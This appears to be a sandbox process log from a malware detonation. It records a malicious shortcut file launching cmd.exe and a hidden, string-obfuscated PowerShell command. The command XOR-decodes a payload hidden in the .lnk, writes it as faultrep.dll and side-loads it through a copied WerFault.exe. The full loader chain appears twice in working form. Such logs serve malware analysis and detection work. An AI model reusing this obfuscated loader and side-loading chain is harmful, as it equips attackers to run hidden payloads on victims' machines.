cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "IZFDLWw" C:\Users\test22\AppData\Local\Temp\e0c3282206b5533bb3272741212cb6e1.lnk
2548cmd.exe "C:\Windows\system32\cmd.exe" /c copy C:\Windows\system32\WerFault.exe C:\Users\test22\AppData\Local\Temp\WerFault.exe && powershell -windowstyle hidden $0dda91a21b6f6536715eb83f21c75451 = G''et-Chil''dItem *.lnk ^| where-object {$_.length -eq 0x000449C8} ^| S''elect-Objec''t -ExpandProperty Name; $bdf6730d5c52821e237a7ceb47d8838d = gc $0dda91a21b6f6536715eb83f21c75451 -Encoding Byte; for($i=0; $i -lt $bdf6730d5c52821e237a7ceb47d8838d.count; $i++) { $bdf6730d5c52821e237a7ceb47d8838d[$i] = $bdf6730d5c52821e237a7ceb47d8838d[$i] -bxor 0x71 }; $e248d8a354f7be26afe13b86a3325e35 = 'C:\Users\test22\AppData\Local\Temp\faultrep.dll'; sc $e248d8a354f7be26afe13b86a3325e35 ([byte[]]($bdf6730d5c52821e237a7ceb47d8838d ^| select -Skip 012858)) -Encoding Byte; ^& C:\Users\test22\AppData\Local\Temp\WerFault.exe;
2660powershell.exe powershell -windowstyle hidden $0dda91a21b6f6536715eb83f21c75451 = G''et-Chil''dItem *.lnk | where-object {$_.length -eq 0x000449C8} | S''elect-Objec''t -ExpandProperty Name; $bdf6730d5c52821e237a7ceb47d8838d = gc $0dda91a21b6f6536715eb83f21c75451 -Encoding Byte; for($i=0; $i -lt $bdf6730d5c52821e237a7ceb47d8838d.count; $i++) { $bdf6730d5c52821e237a7ceb47d8838d[$i] = $bdf6730d5c52821e237a7ceb47d8838d[$i] -bxor 0x71 }; $e248d8a354f7be26afe13b86a3325e35 = 'C:\Users\test22\AppData\Local\Temp\faultrep.dll'; sc $e248d8a354f7be26afe13b86a3325e35 ([byte[]]($bdf6730d5c52821e237a7ceb47d8838d | select -Skip 012858)) -Encoding Byte; & C:\Users\test22\AppData\Local\Temp\WerFault.exe;
2756WerFault.exe "C:\Users\test22\AppData\Local\Temp\WerFault.exe"
2940